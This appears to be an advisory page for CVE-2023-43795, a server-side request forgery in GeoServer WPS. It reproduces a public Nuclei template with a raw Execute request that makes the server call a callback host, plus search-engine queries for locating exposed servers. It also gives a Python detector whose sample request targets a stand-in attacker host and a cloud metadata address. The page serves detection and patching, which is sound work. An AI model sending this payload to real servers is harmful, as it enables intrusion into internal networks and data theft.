CVE-2023-43795: GeoServer WPS - Server Side Request Forgery

Date: 2025-08-01 | Affected software: GeoServer WPS | PoC: public

Vulnerability description

GeoServer is an open source server written in Java that lets users share and edit geospatial data. The OGC Web Processing Service (WPS) specification allows a client to supply process inputs by reference: a wps:Reference element names a URL (with an HTTP method and optional headers) that the server fetches with a GET or POST request before running the process. Because GeoServer fetched whatever URL an Execute request named, an unauthenticated client could make the server issue requests to arbitrary internal or external hosts: Server Side Request Forgery (CWE-918). The vulnerability is fixed in GeoServer 2.22.5 and 2.23.2.

PoC code [public] (Nuclei template)

id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.89551
    epss-percentile: 0.99535
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"GeoServer"
      - http.title:"geoserver"
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
      - title="geoserver"
    google-query: intitle:"geoserver"
  tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns="http://www.opengis.net/wps/1.0.0"
          xmlns:wfs="http://www.opengis.net/wfs"
          xmlns:wps="http://www.opengis.net/wps/1.0.0"
          xmlns:ows="http://www.opengis.net/ows/1.1"
          xmlns:gml="http://www.opengis.net/gml"
          xmlns:ogc="http://www.opengis.net/ogc"
          xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
          xmlns:xlink="http://www.w3.org/1999/xlink"
                xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100eab7c355024699aa869244ffab64093000f282df793c6adbdb1cfa2cabff579302205714718becefc207bdd69d46f1e8fe087debcc713db6a3263781cb2475ef3817:922c64590222798bb761d5b6d8e72950
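The template above confirms the issue from the outside by making GeoServer call back to an out-of-band host. The complementary check a defender wants is on the inbound side: parse WPS Execute bodies and flag wps:Reference inputs that point anywhere other than approved data sources, which is also the request shape to hunt for in proxy or access logs. The Python below is an added example, not code from the original page, from GeoServer or from the Nuclei template; the allow-list, the host names (oast.attacker.example, data.example.org) and the sample Execute body are constructed for this example. It goes slightly beyond the PoC by also separating targets in loopback, private and link-local ranges (the usual SSRF pivot) from plain external hosts.

```python
"""Flag SSRF-shaped WPS Execute requests (the CVE-2023-43795 pattern).

Added example: not GeoServer code and not part of the Nuclei template.
The allow-list, host names and sample request are constructed here.
"""
import ipaddress
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET

WPS = "{http://www.opengis.net/wps/1.0.0}"
OWS = "{http://www.opengis.net/ows/1.1}"
XLINK = "{http://www.w3.org/1999/xlink}"


def is_internal_host(host):
    """True for loopback, RFC 1918, link-local (cloud metadata) and reserved
    addresses, or for 'localhost'; hostnames are not resolved here."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved


def extract_references(body):
    """Return every wps:Reference in an Execute body: the input it feeds,
    the target URL, the HTTP method and any client-supplied wps:Header."""
    if isinstance(body, str):
        body = body.encode()  # bytes keep the encoding declaration valid for lxml as well
    # expat does not fetch external entities; use defusedxml for untrusted input in production
    root = ET.fromstring(body)
    if root.tag != WPS + "Execute":
        return []
    refs = []
    for inp in root.iter(WPS + "Input"):
        name = inp.findtext(OWS + "Identifier", default="").strip()
        for ref in inp.iter(WPS + "Reference"):
            href = ref.get(XLINK + "href") or ref.get("href") or ""
            headers = {h.get("key"): h.get("value") for h in ref.iter(WPS + "Header")}
            refs.append({"input": name, "href": href,
                         "method": (ref.get("method") or "GET").upper(),
                         "headers": headers})
    return refs


def classify(body, allowed_hosts):
    """Label each reference 'allowed', 'internal' or 'external'."""
    findings = []
    for ref in extract_references(body):
        parts = urlsplit(ref["href"])
        host = (parts.hostname or "").lower()
        if host in allowed_hosts:
            verdict = "allowed"
        elif is_internal_host(host):
            verdict = "internal"
        else:
            verdict = "external"
        findings.append({**ref, "host": host, "verdict": verdict})
    return findings


# Constructed sample: the PoC shape (callback host plus a probe header),
# a cloud-metadata target, and a reference to an approved data source.
SAMPLE_EXECUTE = """<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS"
  xmlns:wps="http://www.opengis.net/wps/1.0.0"
  xmlns:ows="http://www.opengis.net/ows/1.1"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <ows:Identifier>JTS:area</ows:Identifier>
  <wps:DataInputs>
    <wps:Input>
      <ows:Identifier>geom</ows:Identifier>
      <wps:Reference mimeType="application/json"
        xlink:href="https://oast.attacker.example/" method="GET">
        <wps:Header key="abcd" value="efghi"/>
      </wps:Reference>
    </wps:Input>
    <wps:Input>
      <ows:Identifier>geom</ows:Identifier>
      <wps:Reference mimeType="application/json"
        xlink:href="http://169.254.169.254/latest/meta-data/" method="GET"/>
    </wps:Input>
    <wps:Input>
      <ows:Identifier>geom</ows:Identifier>
      <wps:Reference mimeType="application/json"
        xlink:href="https://data.example.org/parcels.json" method="GET"/>
    </wps:Input>
  </wps:DataInputs>
</wps:Execute>
"""

ALLOWED_HOSTS = {"data.example.org"}  # assumed allow-list of approved data sources

if __name__ == "__main__":
    for f in classify(SAMPLE_EXECUTE, ALLOWED_HOSTS):
        print(f"{f['verdict']:8} {f['method']} {f['href']} headers={f['headers']}")
```

Run as a script it prints one line per reference with its verdict. Upgrading to 2.22.5 or 2.23.2 is the actual fix; a request-shape check like this belongs in a reverse proxy, WAF or detection rule as a compensating control and is not a substitute, because the fetch itself happens inside GeoServer.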
